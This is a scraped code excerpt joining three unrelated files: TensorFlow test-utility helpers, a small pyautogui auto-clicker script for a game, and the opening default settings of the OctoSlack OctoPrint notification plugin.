(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertRaisesIncompatibleShapesError(
self, exception_type=errors.InvalidArgumentError):
return self.assertRaisesWithPredicateMatch(
exception_type, r"Incompatible shapes|Dimensions must be equal|"
r"required broadcastable shapes")
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
@py_func_if_in_function
  def assertDictEqual(self, a, b, msg=None):
    """Assert that two given dictionaries of tensors are the same.
Args:
a: Expected dictionary with numpy ndarray or anything else that can be
converted to one as values.
b: Actual dictionary with numpy ndarray or anything else that can be
converted to one as values.
msg: Optional message to report on failure.
"""
# To keep backwards compatibility, we first try the base class
# assertDictEqual. If that fails we try the tensorflow one.
try:
super().assertDictEqual(a, b, msg)
except Exception: # pylint: disable=broad-except
self.assertSameElements(a.keys(), b.keys()) # pylint: disable=g-assert-in-except
for k, v in a.items():
(a_k, b_k) = self.evaluate_if_both_tensors(v, b[k])
a_k = self._GetNdArray(a_k)
b_k = self._GetNdArray(b_k)
if np.issubdtype(a_k.dtype, np.floating):
self.assertAllClose(v, b[k], msg=k)
else:
self.assertAllEqual(v, b[k], msg=k)
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
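# Illustrative usage sketch (not part of the original module): a minimal test
# case exercising a few of the helpers above (evaluate, assertAllClose,
# assertAllInRange, checkedThread). Class and method names are hypothetical.
def _example_tensorflow_test_case_usage():
  from tensorflow.python.framework import constant_op  # local import for the sketch
  class _HelperUsageTest(TensorFlowTestCase):  # hypothetical test case
    def testNumericHelpers(self):
      x = constant_op.constant([0.1, 0.5, 0.9])
      x_np = self.evaluate(x)  # works in both graph and eager modes
      self.assertAllClose(x_np, [0.1, 0.5, 0.9])
      self.assertAllInRange(x_np, 0.0, 1.0)
    def testCheckedThread(self):
      results = []
      # checkedThread surfaces exceptions raised in the worker thread as test
      # failures instead of letting them pass silently.
      t = self.checkedThread(target=lambda: results.append(1 + 1))
      t.start()
      t.join()
      self.assertAllEqual(results, [2])
  return _HelperUsageTest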
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
"PS" stands for "parameter server": a task responsible for storing and
updating the model's parameters. Other tasks send updates to these parameters
as they work on optimizing the parameters. This particular division of labor
between tasks is not required, but is common for distributed training.
  Read more at https://www.tensorflow.org/guide/extend/architecture
  (Figure omitted: a diagram illustrating the interaction of these components.)
"/job:worker/task:0" and "/job:ps/task:0" are both tasks with worker services.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.compat.v1.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in the
documentation of `tf.distribute.Server`.
worker_config: (optional) `tf.ConfigProto` to initialize workers. Can be
used to instantiate multiple devices etc.
ps_config: (optional) `tf.ConfigProto` to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.distribute.Server` (all running
locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
import portpicker # pylint: disable=g-import-not-at-top
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs,
job_name="worker",
protocol=protocol,
task_index=ix,
config=worker_config,
start=True) for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs,
job_name="ps",
protocol=protocol,
task_index=ix,
config=ps_config,
start=True) for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name or None.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
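# Illustrative usage sketch (not part of the original module): looking up a
# NodeDef by name in a freshly built graph; the node name below is simply the
# name given to the constant op.
def _example_get_node_def_from_graph_usage():
  from tensorflow.python.framework import constant_op  # local import for the sketch
  with ops.Graph().as_default() as g:
    constant_op.constant(1.0, name="my_const")
  node_def = get_node_def_from_graph("my_const", g.as_graph_def())
  assert node_def is not None and node_def.op == "Const"
  return node_def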
def set_producer_version(graph, producer_version):
"""Sets graph.graph_def_versions.producer to `producer_version`."""
# The C API doesn't expose altering GraphDefVersions. We can indirectly set
# it via import_graph_def though.
graph_def = graph_pb2.GraphDef()
graph_def.versions.producer = producer_version
with graph.as_default():
importer.import_graph_def(graph_def)
assert graph.graph_def_versions.producer, producer_version
@contextlib.contextmanager
def _fake_gradient_tape_context_manager():
  """tf.gradients(...) exposed through the tf.GradientTape context manager interface.
  This is useful to test tf.gradients() in tests that use tf.GradientTape().
Yields:
gradient tape instance that's implemented by tf.gradients() underneath.
"""
try:
class FakeGradientTape:
def watch(self, x):
pass
def gradient(self, y, x, grad_ys=None):
result = gradients_impl.gradients(y, x, grad_ys)
# Unlike `tape.gradient()`, `tf.gradients()` returns a list for a single
# element. So unpack if needed to match `tape.gradient()` behavior.
if not isinstance(x, (list, tuple)):
assert len(result) == 1
return result[0]
return result
yield FakeGradientTape()
finally:
pass
class AbstractGradientTape:
"""Abstract GradientTape context manager that has multiple implementations.
This is useful to test both tf.GradientTape() and tf.gradients() without
duplicating tests.
"""
def __init__(self, use_tape, persistent=False):
self._use_tape = use_tape
self._persistent = persistent
def __enter__(self):
if self._use_tape:
self._tape_impl = backprop.GradientTape(persistent=self._persistent)
else:
self._tape_impl = _fake_gradient_tape_context_manager()
return self._tape_impl.__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self._tape_impl.__exit__(exc_type, exc_val, exc_tb)
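# Illustrative usage sketch (not part of the original module): the same gradient
# check written once and driven by a `use_tape` parameter. Note that the
# tf.GradientTape path assumes eager execution while the tf.gradients() path
# assumes graph mode; the function under test (x * x) and values are hypothetical.
def _example_abstract_gradient_tape_usage(test_case, use_tape):
  from tensorflow.python.framework import constant_op  # local import for the sketch
  x = constant_op.constant(3.0)
  with AbstractGradientTape(use_tape=use_tape) as tape:
    tape.watch(x)
    y = x * x
  dy_dx = tape.gradient(y, x)
  # d(x^2)/dx evaluated at x = 3 is 6.
  test_case.assertAllClose(dy_dx, 6.0)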
@contextlib.contextmanager
def run_functions_eagerly(run_eagerly):
"""Runs functions eagerly if `run_eagerly` is true.
WARNING: Setting `run_eagerly` to True in tests running in V1 graph mode
  *WILL NOT* make the tf.function run eagerly because eager is disabled by
default in V1. Instead, tf.function will run as a traced graph function.
Ensures that the state (for running functions eagerly) is back to the initial
`def_function.RUN_FUNCTIONS_EAGERLY` state.
Args:
run_eagerly: Boolean determining whether to run the function eagerly or not.
Raises:
    ValueError: If `run_eagerly` is not a boolean.
Yields:
Nothing.
"""
if not isinstance(run_eagerly, bool):
raise ValueError(
"Expected bool for `run_eagerly` but got {}".format(run_eagerly))
is_eager = context.executing_eagerly()
if not is_eager and run_eagerly:
logging.warning(
"Running tf.function eagerly in V1 graph mode is not supported. "
"tf.function will be run as a traced graph function.")
initial_state = def_function.functions_run_eagerly()
def_function.run_functions_eagerly(run_eagerly)
try:
yield
finally:
def_function.run_functions_eagerly(initial_state)
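# Illustrative usage sketch (not part of the original module): temporarily
# forcing tf.functions to run eagerly, e.g. to step through their Python bodies
# in a debugger. The function below is hypothetical.
def _example_run_functions_eagerly_usage():
  square = def_function.function(lambda x: x * x)
  with run_functions_eagerly(True):
    # With eager execution enabled, the Python body runs directly instead of as
    # a traced graph function, which makes debugging easier.
    return square(3.0)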
|
auto_game_typey.py
|
#!/usr/bin/python3
import pyautogui
import time
import keyboard
import threading
def print_pos():
    # Continuously print the current mouse position (useful for finding coordinates).
    while(1):
print(pyautogui.position())
def everysec_press():
    # Repeatedly press the space bar (about every 50 ms) until 'q' is held down.
    while(1):
# pyautogui.dragRel(0,0,1,button='left')
# pyautogui.press('b')
pyautogui.press(' ')
time.sleep(0.05)
# time.sleep(0.5)
# if X>1900:
# break
print('press')
if keyboard.is_pressed('q'):
return
def everysec_click():
    # Repeatedly click the mouse (about every 10 ms) until 'q' is held down.
    while(1):
pyautogui.click()
time.sleep(0.01)
print('click')
if keyboard.is_pressed('q'):
return
def everymin():
    # Press 'p' every n seconds until 'q' is held down.
    n = 35
    while(1):
# n+=0.1
pyautogui.press('p')
for i in range(n):
time.sleep(1)
print(i)
if keyboard.is_pressed('q'):
return
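# Illustrative sketch (not part of the original script): one way to run the
# key-press and click loops concurrently as daemon threads until 'q' is pressed.
def run_all_loops():
    press_thread = threading.Thread(target=everysec_press, daemon=True)
    click_thread = threading.Thread(target=everysec_click, daemon=True)
    press_thread.start()
    click_thread.start()
    # Block here until the user holds 'q'; the loops above also watch for 'q'.
    keyboard.wait('q')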
if __name__=="__main__":
# __x = 1850
    # __y = 950
# pyautogui.click(x=__x,y=__y)
# t1 = threading.Thread(target=everysec_press)
# t2 = threading.Thread(target=everysec_click)
# t3 = threading.Thread(target=everymin)
    # Start the threads
# t1.start()
# t2.start()
# t3.start()
print_pos()
|
__init__.py
|
# coding=utf-8
# encoding: utf-8
from __future__ import absolute_import
from octoprint.util.version import get_octoprint_version_string
from tempfile import mkstemp
from datetime import timedelta
from slackclient import SlackClient
from slacker import Slacker, IncomingWebhook
from imgurpython import ImgurClient
from imgurpython.helpers.error import ImgurClientError, ImgurClientRateLimitError
from pushbullet import Pushbullet
from pushover_complete import PushoverAPI
from rocketchat.api import RocketChatAPI
from matrix_client.client import MatrixClient
from matrix_client.client import Room as MatrixRoom
from PIL import Image
from octoprint.util import RepeatedTimer
from websocket import WebSocketConnectionClosedException
from minio import Minio
from sarge import run, Capture, shell_quote
from discord_webhook import DiscordWebhook, DiscordEmbed
import octoprint.util
import octoprint.plugin
import urllib2
import datetime
import base64
import Queue
import json
import os
import os.path
import exceptions
import uuid
import time
import tinys3
import humanize
import threading
import requests
import math
import re
import copy
import netifaces
import pytz
import socket
SLACKER_TIMEOUT = 60
COMMAND_EXECUTION_WAIT = 10
class OctoslackPlugin(
octoprint.plugin.SettingsPlugin,
octoprint.plugin.AssetPlugin,
octoprint.plugin.StartupPlugin,
octoprint.plugin.ShutdownPlugin,
octoprint.plugin.ProgressPlugin,
octoprint.plugin.EventHandlerPlugin,
octoprint.plugin.TemplatePlugin,
):
    ##TODO FEATURE - generate an animated gif of the print - easy enough if we can find a Python lib to create the gif (images2gif is buggy & moviepy, imageio, and visvis, which rely on numpy, haven't worked out as I never even let numpy try to finish installing after 5/10 minutes on my RasPi3)
##TODO FEATURE - add the timelapse gallery for cancelled/failed/completed as a single image
##TODO FEATURE - Add support for Imgur image title + description
##TODO FEATURE - Optionally upload timelapse video to youtube & send a Slack message when the upload is complete
##TODO FEATURE - Define a third set of messages for each event to allow sending M117 commands to the printer
##TODO ENHANCEMENT - The progress event fires on gcode uploads and triggers Octoslack events. Test and fix if necessary.
##TODO ENHANCEMENT - Consider extending the progress snapshot minimum interval beyond Slack to other providers
    ##TODO ENHANCEMENT - Add Personal Token, emoji, avatar, and other formatting enhancements to the Rocket.Chat API once a library supports them (or update the libs yourself)
    ##TODO We've certainly moved past the "it's time to refactor" line. Both the UI/JS/Python code need to be refactored
##TODO add multi-cam support: https://plugins.octoprint.org/plugins/multicam/
##~~ SettingsPlugin mixin
def get_settings_defaults(self):
return {
"connection_method": "APITOKEN",
"slack_apitoken_config": {
"api_token": "",
"enable_commands": True,
"commands_positive_reaction": ":thumbsup:",
"commands_negative_reaction": ":thumbsdown:",
"commands_processing_reaction": ":stopwatch:",
"commands_unauthorized_reaction": ":lock:",
},
"slack_webhook_config": {"webhook_url": ""},
"slack_identity": {
"existing_user": True,
"icon_url": "",
"icon_emoji": "",
"username": "",
},
"slack_rtm_enabled_commands": {
"help": {"enabled": True, "restricted": False},
"status": {"enabled": True, "restricted": False},
"stop": {"enabled": True, "restricted": False},
"pause": {"enabled": True, "restricted": False},
"resume": {"enabled": True, "restricted": False},
},
"slack_rtm_authorized_users": "",
"channel": "",
"pushbullet_config": {"access_token": "", "channel": ""},
"pushover_config": {"app_token": "", "user_key": ""},
"rocketchat_config": {
"server_url": "",
"username": "",
"password": "",
"channel": "",
},
"matrix_config": {
"server_url": "",
"access_token": "",
"user_id": "",
"channel": "",
},
"discord_config": {
"webhook_urls": "",
"alternate_username": "",
"avatar_url": "",
},
"ignore_cancel_fail_event": True,
"mattermost_compatability_mode": False,
"include_raspi_temp": True,
"snapshot_upload_method": "NONE",
"imgur_config": {
"client_id": "",
"client_secret": "",
"refresh_token": "",
"album_id": "",
},
"s3_config": {
"AWSAccessKey": "",
"AWSsecretKey": "",
"s3Bucket": "",
"file_expire_days": -1,
"URLStyle": "PATH",
},
"minio_config": {
"AccessKey": "",
"SecretKey": "",
"Bucket": "",
"Endpoint": "s3.amazonaws.com",
"secure": True,
            },
            "additional_snapshot_urls": "",
            "snapshot_arrangement": "HORIZONTAL", ##HORIZONTAL or VERTICAL or GRID
"time_format": "HUMAN", ##FUZZY or EXACT or HUMAN
"supported_events": {
##Not a real event but we'll leverage the same config structure
"Help": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Help - Supported commands :question:",
"Fallback": "",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"IncludeSupportedCommands": True,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Startup": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Octoprint service started :chart_with_upwards_trend:",
"Fallback": "Octoprint service started",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": True,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Shutdown": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Octoprint service stopped :chart_with_downwards_trend:",
"Fallback": "Octoprint service stopped",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Connecting": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Connecting to printer :satellite:",
"Fallback": "Connecting to printer",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Connected": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Successfully connected to printer :computer:",
"Fallback": "Successfully connected to printer",
"Color": "good",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Disconnecting": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Printer disconnecting :confused:",
"Fallback": "Printer disconnecting",
"Color": "warning",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Disconnected": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Printer disconnected :worried:",
"Fallback": "Printer disconnected",
"Color": "danger",
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"Error": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Printer error :fire:",
"Fallback": "Printer error: {error}",
"Color": "danger",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintStarted": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: A new print has started :rocket:",
"Fallback": "Print started: {print_name}, Estimate: {remaining_time}",
"Color": "good",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": True,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintFailed": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print failed :bomb:",
"Fallback": "Print failed: {print_name}",
"Color": "danger",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintCancelling": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print is being cancelled :no_good:",
"Fallback": "Print is being cancelled: {print_name}",
"Color": "warning",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": True,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintCancelled": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print cancelled :no_good:",
"Fallback": "Print cancelled: {print_name}",
"Color": "warning",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportFinalPrintTime": False,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintDone": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print finished successfully :dancer:",
"Fallback": "Print finished successfully: {print_name}, Time: {elapsed_time}",
"Color": "good",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": True,
"ReportJobProgress": False,
"ReportFinalPrintTime": True,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
##Not a real event but we'll leverage the same config structure
"Progress": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print progress {pct_complete} :horse_racing:",
"Fallback": "Print progress: {pct_complete} - {print_name}, Elapsed: {elapsed_time}, Remaining: {remaining_time}",
"Color": "good",
"CaptureSnapshot": True,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": True,
"ReportMovieStatus": False,
"UpdateMethod": "NEW_MESSAGE",
# Minimum time in minutes to wait before uploading a snapshot again for a progress upload
"SlackMinSnapshotUpdateInterval": 10,
"IntervalPct": 25,
"IntervalHeight": 0,
"IntervalTime": 0,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
##Not a real event but we'll leverage the same config structure
"GcodeEvent": {
"Enabled": False, ##Overwritten by each event
"ChannelOverride": "", ##Overwritten by each event
"Message": "", ##Overwritten by each event
"Fallback": "", ##Overwritten by each event
"Color": "good", ##Hardcoded to 'good' for now
"CaptureSnapshot": False, ##Overwritten by each event
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": True,
"ReportJobOrigEstimate": False,
"ReportJobProgress": True,
"ReportMovieStatus": False,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
##Not a real event but we'll leverage the same config structure
"Heartbeat": {
"Enabled": False,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Heartbeat - Printer status: {printer_status} :heartbeat:",
"Fallback": "Heartbeat - Printer status: {printer_status}",
"Color": "good", ##Color may be updated in process_slack_event
"CaptureSnapshot": False,
"ReportPrinterState": True,
"ReportEnvironment": False,
"ReportJobState": False,
"ReportJobOrigEstimate": False,
"ReportJobProgress": False,
"ReportMovieStatus": False,
"IntervalTime": 60,
"PushoverSound": "pushover",
"PushoverPriority": 0,
"CommandEnabled": False,
"CaptureCommandReturnCode": False,
"CaptureCommandOutput": False,
"Command": "",
"MinNotificationInterval": 0,
},
"PrintPaused": {
"Enabled": True,
"ChannelOverride": "",
"Message": ":heavy_minus_sign: Print paused :zzz:",
